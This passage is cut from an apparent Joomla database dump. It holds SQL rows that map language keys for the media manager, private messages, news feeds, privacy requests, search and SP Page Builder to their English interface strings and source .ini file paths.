empty!','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(420,'COM_MEDIA_ERROR_UNABLE_TO_DELETE_FOLDER_WARNDIRNAME','Unable to delete: %s. Folder name must only have alphanumeric characters and no spaces.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(421,'COM_MEDIA_ERROR_UNABLE_TO_UPLOAD_FILE','Unable to upload file.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(422,'COM_MEDIA_ERROR_WARNFILETOOLARGE','This file is too large to upload.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(423,'COM_MEDIA_ERROR_WARNUPLOADTOOLARGE','Total size of upload exceeds the limit.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(424,'COM_MEDIA_FIELD_CHECK_MIME_DESC','Use MIME Magic or Fileinfo to try to verify files. Try disabling this if you get invalid mime type errors.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(425,'COM_MEDIA_FIELD_CHECK_MIME_LABEL','Check MIME Types','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(426,'COM_MEDIA_FIELD_IGNORED_EXTENSIONS_DESC','Ignored file extensions for MIME type checking and restricted uploads.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(427,'COM_MEDIA_FIELD_IGNORED_EXTENSIONS_LABEL','Ignored Extensions','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(428,'COM_MEDIA_FIELD_ILLEGAL_MIME_TYPES_DESC','A comma separated list of illegal MIME types to upload (blacklist).','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(429,'COM_MEDIA_FIELD_ILLEGAL_MIME_TYPES_LABEL','Illegal MIME Types','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(430,'COM_MEDIA_FIELD_LEGAL_EXTENSIONS_DESC','Extensions (file types) you are allowed to upload (comma separated).','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(431,'COM_MEDIA_FIELD_LEGAL_EXTENSIONS_LABEL','Legal Extensions (File Types)','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(432,'COM_MEDIA_FIELD_LEGAL_IMAGE_EXTENSIONS_DESC','Image extensions (file types) you are allowed to upload (comma separated). These are used to check for valid image headers.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(433,'COM_MEDIA_FIELD_LEGAL_IMAGE_EXTENSIONS_LABEL','Legal Image Extensions (File Types)','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(434,'COM_MEDIA_FIELD_LEGAL_MIME_TYPES_DESC','A comma separated list of legal MIME types to upload.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(435,'COM_MEDIA_FIELD_LEGAL_MIME_TYPES_LABEL','Legal MIME Types','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(436,'COM_MEDIA_FIELD_MAXIMUM_SIZE_DESC','The maximum size for an upload (in megabytes). Use zero for no limit. Note: your server has a maximum limit.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(437,'COM_MEDIA_FIELD_MAXIMUM_SIZE_LABEL','Maximum Size (in MB)','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(438,'COM_MEDIA_FIELD_PATH_FILE_FOLDER_DESC','Enter the path to the file folder relative to root.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(439,'COM_MEDIA_FIELD_PATH_FILE_FOLDER_LABEL','Path to File Folder','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(440,'COM_MEDIA_FIELD_PATH_IMAGE_FOLDER_DESC','Enter the path to the image folder relative to root.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(441,'COM_MEDIA_FIELD_PATH_IMAGE_FOLDER_LABEL','Path to Image Folder','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(442,'COM_MEDIA_FIELD_RESTRICT_UPLOADS_DESC','Restrict uploads for lower than manager users to images if Fileinfo or MIME Magic isn\'t installed.','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(443,'COM_MEDIA_FIELD_RESTRICT_UPLOADS_LABEL','Restrict Uploads','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(444,'COM_MEDIA_FILES','Files','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(445,'COM_MEDIA_FILESIZE','File size','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(446,'COM_MEDIA_FOLDER','Folder','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(447,'COM_MEDIA_FOLDERS','Folders','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(448,'COM_MEDIA_IMAGE_DESCRIPTION','Image Description','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(449,'COM_MEDIA_IMAGE_URL','Image URL','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(450,'COM_MEDIA_INSERT','Insert','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(451,'COM_MEDIA_INSERT_IMAGE','Insert Image','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(452,'COM_MEDIA_MAXIMUM_SIZE','Maximum Size','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(453,'COM_MEDIA_MEDIA','Media','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(454,'COM_MEDIA_NAME','Image Name','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(455,'COM_MEDIA_NO_IMAGES_FOUND','No Images Found','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(456,'COM_MEDIA_NOT_SET','Not Set','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(457,'COM_MEDIA_OVERALL_PROGRESS','Overall Progress','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(458,'COM_MEDIA_PIXEL_DIMENSIONS','Pixel Dimensions (w x h)','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(459,'COM_MEDIA_START_UPLOAD','Start Upload','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(460,'COM_MEDIA_THUMBNAIL_VIEW','Thumbnail View','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(461,'COM_MEDIA_TITLE','Image Title','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(462,'COM_MEDIA_UP','Up','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(463,'COM_MEDIA_UPLOAD','Upload','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(464,'COM_MEDIA_UPLOAD_FILES','Upload files (Maximum Size: %s MB)','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(465,'COM_MEDIA_UPLOAD_FILES_NOLIMIT','Upload files (No maximum size)','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(466,'COM_MEDIA_UPLOAD_COMPLETE','Upload Complete','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(467,'COM_MEDIA_UPLOAD_FILE','Upload file','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(468,'COM_MEDIA_UPLOAD_SUCCESSFUL','Upload Successful','/home/smthsmth/public_html/language/en-GB/en-GB.com_media.ini'),(469,'COM_MESSAGES_ERR_SEND_FAILED','The user has locked their mailbox. Message failed.','/home/smthsmth/public_html/language/en-GB/en-GB.com_messages.ini'),(470,'COM_MESSAGES_NEW_MESSAGE','New Message from %1$s at %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.com_messages.ini'),(471,'COM_MESSAGES_NEW_MESSAGE_ARRIVED','A new private message has arrived from %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_messages.ini'),(472,'COM_MESSAGES_PLEASE_LOGIN','Please log in to %s to read your message.','/home/smthsmth/public_html/language/en-GB/en-GB.com_messages.ini'),(473,'COM_NEWSFEEDS_CACHE_DIRECTORY_UNWRITABLE','The cache folder is unwritable. The news feed can\'t be displayed. Please contact a site administrator.','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(474,'COM_NEWSFEEDS_CAT_NUM','# of News feeds :','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(475,'COM_NEWSFEEDS_CONTENT_TYPE_NEWSFEED','News Feed','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(476,'COM_NEWSFEEDS_CONTENT_TYPE_CATEGORY','News Feed Category','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(477,'COM_NEWSFEEDS_DEFAULT_PAGE_TITLE','News Feeds','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(478,'COM_NEWSFEEDS_ERROR_FEED_NOT_FOUND','Error. Feed not found.','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(479,'COM_NEWSFEEDS_ERRORS_FEED_NOT_RETRIEVED','Error. Feed could not be retrieved.','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(480,'COM_NEWSFEEDS_FEED_LINK','Feed Link','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(481,'COM_NEWSFEEDS_FEED_NAME','Feed Name','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(482,'COM_NEWSFEEDS_FILTER_LABEL','Filter Field','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(483,'COM_NEWSFEEDS_FILTER_SEARCH_DESC','News Feed Filter Search','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(484,'COM_NEWSFEEDS_NO_ARTICLES','No Articles for this News Feed.','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(485,'COM_NEWSFEEDS_NUM_ARTICLES','# Articles','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(486,'COM_NEWSFEEDS_NUM_ARTICLES_COUNT','# Articles: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(487,'COM_NEWSFEEDS_NUM_ITEMS','# News feeds','/home/smthsmth/public_html/language/en-GB/en-GB.com_newsfeeds.ini'),(488,'COM_PRIVACY','Privacy','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(489,'COM_PRIVACY_ADMIN_NOTIFICATION_USER_CONFIRMED_REQUEST_MESSAGE','User %1$s has confirmed their information request.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(490,'COM_PRIVACY_ADMIN_NOTIFICATION_USER_CONFIRMED_REQUEST_SUBJECT','Information Request Confirmed By User','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(491,'COM_PRIVACY_ADMIN_NOTIFICATION_USER_CREATED_REQUEST_MESSAGE','A new information request has been submitted by %1$s.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(492,'COM_PRIVACY_ADMIN_NOTIFICATION_USER_CREATED_REQUEST_SUBJECT','Information Request Submitted','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(493,'COM_PRIVACY_CONFIRM_REMIND_SUCCEEDED','Your consent to this web site\'s Privacy Policy has been extended.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(494,'COM_PRIVACY_CONFIRM_REQUEST_FIELDSET_LABEL','An email has been sent to your email address. The email has a confirmation token, please confirm your email address again and paste the confirmation token in the field below to prove that you are the owner of the information being requested.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(495,'COM_PRIVACY_CONFIRM_REQUEST_SUCCEEDED','Your information request has been confirmed. We will process your request as soon as possible and the export will be sent to your email.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(496,'COM_PRIVACY_CREATE_REQUEST_SUCCEEDED','Your information request has been created. Before it can be processed, you must verify this request. An email has been sent to your address with additional instructions to complete this verification.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(497,'COM_PRIVACY_EMAIL_REQUEST_BODY_EXPORT_REQUEST','Someone has created a request to export all personal information related to this email address at [URL]. As a security measure, you must confirm that this is a valid request for your personal information from this website.\\n\\nIf this was a mistake, just ignore this email and nothing will happen.\\n\\nIn order to confirm this request, you can complete one of the following tasks:\\n\\n1. Visit the following URL: [TOKENURL]\\n\\n2. Copy your token from this email, visit the referenced URL, and paste your token into the form.\\nURL: [FORMURL]\\nToken: [TOKEN]\\n\\nPlease note that this token is only valid for 24 hours from the time this email was sent.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(498,'COM_PRIVACY_EMAIL_REQUEST_BODY_REMOVE_REQUEST','Someone has created a request to remove all personal information related to this email address at [URL]. As a security measure, you must confirm that this is a valid request for your personal information to be removed from this website.\\n\\nIf this was a mistake, just ignore this email and nothing will happen.\\n\\nIn order to confirm this request, you can complete one of the following tasks:\\n\\n1. Visit the following URL: [TOKENURL]\\n\\n2. Copy your token from this email, visit the referenced URL, and paste your token into the form.\\nURL: [FORMURL]\\nToken: [TOKEN]\\n\\nPlease note that this token is only valid for 24 hours from the time this email was sent.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(499,'COM_PRIVACY_EMAIL_REQUEST_SUBJECT_EXPORT_REQUEST','Information Request Created at [SITENAME]','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(500,'COM_PRIVACY_EMAIL_REQUEST_SUBJECT_REMOVE_REQUEST','Information Deletion Request Created at [SITENAME]','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(501,'COM_PRIVACY_ERROR_CANNOT_CREATE_REQUEST_WHEN_SENDMAIL_DISABLED','An information request can\'t be created when email support is disabled.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(502,'COM_PRIVACY_ERROR_CHECKING_FOR_EXISTING_REQUESTS','There was an error checking for existing information requests, please try submitting this request again.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(503,'COM_PRIVACY_ERROR_CONFIRM_TOKEN_EXPIRED','The confirmation token for your information request has expired. You will need to submit a new request.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(504,'COM_PRIVACY_ERROR_CONFIRMING_REMIND_FAILED','No expiration reminder was found.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(505,'COM_PRIVACY_ERROR_CONFIRMING_REQUEST','Error while confirming the information request.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(506,'COM_PRIVACY_ERROR_CONFIRMING_REQUEST_FAILED','Your information request confirmation failed. %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(507,'COM_PRIVACY_ERROR_CREATING_REQUEST','Error while creating the information request.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(508,'COM_PRIVACY_ERROR_CREATING_REQUEST_FAILED','Your information request could not be created. %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(509,'COM_PRIVACY_ERROR_NO_PENDING_REMIND','No expiration reminder has been sent yet.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(510,'COM_PRIVACY_ERROR_NO_PENDING_REQUESTS','There are no information requests for this email address requiring confirmation.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(511,'COM_PRIVACY_ERROR_NO_REMIND_REQUESTS','Please re-check the token','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(512,'COM_PRIVACY_ERROR_PENDING_REQUEST_OPEN','There is already an active information request for this email address and request type. Please contact the site owner for updates on this request.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(513,'COM_PRIVACY_ERROR_REMIND_REQUEST','An error occurred while processing your request.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(514,'COM_PRIVACY_ERROR_UNKNOWN_REQUEST_TYPE','Unknown information request type.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(515,'COM_PRIVACY_FIELD_CONFIRM_CONFIRM_TOKEN_DESC','Enter the confirmation token you received by email.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(516,'COM_PRIVACY_FIELD_CONFIRM_CONFIRM_TOKEN_LABEL','Confirmation Token','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(517,'COM_PRIVACY_FIELD_CONFIRM_EMAIL_DESC','Enter your email address.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(518,'COM_PRIVACY_FIELD_REMIND_CONFIRM_TOKEN_DESC','Enter the confirmation token you received by email.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(519,'COM_PRIVACY_FIELD_REMIND_CONFIRM_TOKEN_LABEL','Confirmation Token','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(520,'COM_PRIVACY_FIELD_REQUEST_TYPE_DESC','The type of information request.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(521,'COM_PRIVACY_FIELD_REQUEST_TYPE_LABEL','Request Type','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(522,'COM_PRIVACY_FIELD_STATUS_DESC','The status of the information request.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(523,'COM_PRIVACY_REMIND_REQUEST_FIELDSET_LABEL','Renew Privacy Consent','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(524,'COM_PRIVACY_REQUEST_TYPE_EXPORT','Export','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(525,'COM_PRIVACY_REQUEST_TYPE_REMOVE','Remove','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(526,'COM_PRIVACY_VIEW_CONFIRM_PAGE_TITLE','Confirm Information Request','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(527,'COM_PRIVACY_VIEW_REQUEST_PAGE_TITLE','Submit Information Request','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(528,'COM_PRIVACY_WARNING_CANNOT_CREATE_REQUEST_WHEN_SENDMAIL_DISABLED','We\'re sorry, you can\'t submit an information request at this time.','/home/smthsmth/public_html/language/en-GB/en-GB.com_privacy.ini'),(529,'COM_SEARCH_ALL_WORDS','All words','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(530,'COM_SEARCH_ALPHABETICAL','Alphabetical','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(531,'COM_SEARCH_ANY_WORDS','Any words','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(532,'COM_SEARCH_ERROR_ENTERKEYWORD','Enter a search keyword','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(533,'COM_SEARCH_ERROR_IGNOREKEYWORD','One or more common words were ignored in the search.','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(534,'COM_SEARCH_ERROR_SEARCH_MESSAGE','Search term must be a minimum of %1$s characters and a maximum of %2$s characters.','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(535,'COM_SEARCH_EXACT_PHRASE','Exact Phrase','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(536,'COM_SEARCH_FIELD_SEARCH_PHRASES_DESC','Show the search options.','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(537,'COM_SEARCH_FIELD_SEARCH_PHRASES_LABEL','Use Search Options','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(538,'COM_SEARCH_FIELD_SEARCH_AREAS_DESC','Show the search areas checkboxes.','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(539,'COM_SEARCH_FIELD_SEARCH_AREAS_LABEL','Use Search Areas','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(540,'COM_SEARCH_FOR','Search for:','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(541,'COM_SEARCH_MOST_POPULAR','Most Popular','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(542,'COM_SEARCH_NEWEST_FIRST','Newest First','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(543,'COM_SEARCH_OLDEST_FIRST','Oldest First','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(544,'COM_SEARCH_ORDERING','Ordering:','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(545,'COM_SEARCH_SEARCH','Search','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(546,'COM_SEARCH_SEARCH_AGAIN','Search Again','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(547,'COM_SEARCH_SEARCH_KEYWORD','Search Keyword:','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(548,'COM_SEARCH_SEARCH_KEYWORD_N_RESULTS_1','<strong>Total: One result found.</strong>','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(549,'COM_SEARCH_SEARCH_KEYWORD_N_RESULTS','<strong>Total: %s results found.</strong>','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(550,'COM_SEARCH_SEARCH_ONLY','Search Only:','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(551,'COM_SEARCH_SEARCH_RESULT','Search Result','/home/smthsmth/public_html/language/en-GB/en-GB.com_search.ini'),(552,'COM_SPPAGEBUILDER_PAGE_SAVE_SUCCESS','Page successfully saved.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(553,'COM_SPPAGEBUILDER_PAGE_TITLE_REQUIRED','Page title is required.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(554,'COM_SPPAGEBUILDER_PAGE_EDIT','Edit Page','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(555,'COM_SPPAGEBUILDER_ERROR_PAGE_NOT_FOUND','Page Not Found','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(556,'COM_SPPAGEBUILDER_ERROR_EDIT_PERMISSION','You are not permitted to edit this page.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(557,'COM_SPPAGEBUILDER_NO_ITEMS_FOUND','No item found!','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(558,'COM_SPPAGEBUILDER_RECAPTCHA_NOT_INSTALLED','Please make sure that, re-captcha pluging is enabled','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(559,'COM_SPPAGEBUILDER_INVALID_CAPTCHA','Invalid Recaptcha','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(560,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_NAME','Name','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(561,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_EMAIL','Email','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(562,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUBJECT','Subject','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(563,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_MESSAGE','Message','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(564,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_PHONE','Phone','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(565,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SEND','Send Message','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(566,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_WRONG_CAPTCHA','Wrong answer! Please enter right answer.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(567,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUCCESS','Email sent successfully!','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(568,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FAILED','Email sent failed.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(569,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_CAPTCHA_NOT_INSTALLED','Please make sure that, re-captcha pluging is enabled','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(570,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INVALID_CAPTCHA','Invalid Recaptcha','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(571,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INVISIBLE_CAPTCHA_NOT_INSTALLED','Please make sure reCaptcha v3(invisible) is enabled or reCaptcha secret/site key is valid.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(572,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SENDER_IP','Sender IP','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(573,'COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_TAC','Accepted Terms, Privacy/GDPR','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(574,'COM_SPPAGEBUILDER_TWEET_FOLLOWERS','Followers','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(575,'COM_SPPAGEBUILDER_TWEET_FOLLOW','Follow','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(576,'COM_SPPAGEBUILDER_SECOND','Second','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(577,'COM_SPPAGEBUILDER_SECONDS','Seconds','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(578,'COM_SPPAGEBUILDER_MINUTE','Minute','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(579,'COM_SPPAGEBUILDER_MINUTES','Minutes','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(580,'COM_SPPAGEBUILDER_HOUR','Hour','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(581,'COM_SPPAGEBUILDER_HOURS','Hours','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(582,'COM_SPPAGEBUILDER_DAY','Day','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(583,'COM_SPPAGEBUILDER_DAYS','Days','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(584,'COM_SPPAGEBUILDER_MONTHS','Months','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(585,'COM_SPPAGEBUILDER_MONTH','Month','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(586,'COM_SPPAGEBUILDER_YEAR','Year','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(587,'COM_SPPAGEBUILDER_YEARS','Years','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(588,'COM_SPPAGEBUILDER_AGO','ago','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(589,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_TOTAL_SHARES','Shares','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(590,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_FACEBOOK','Facebook','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(591,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_TWITTER','Twitter','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(592,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_GOOGLE_PLUS','Google Plus','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(593,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_LINKEDIN','Linkedin','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(594,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_PINTEREST','Pinterest','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(595,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_THUMBLR','Thublr','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(596,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_GETPOCKET','Getpocket','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(597,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_REDDIT','Reddit','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(598,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_VK','VK','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(599,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_XING','Xing','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(600,'COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_WHATSAPP','WhatsApp','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(601,'COM_SPPAGEBUILDER_ADDON_ARTICLE_NO_ITEMS_FOUND','No item 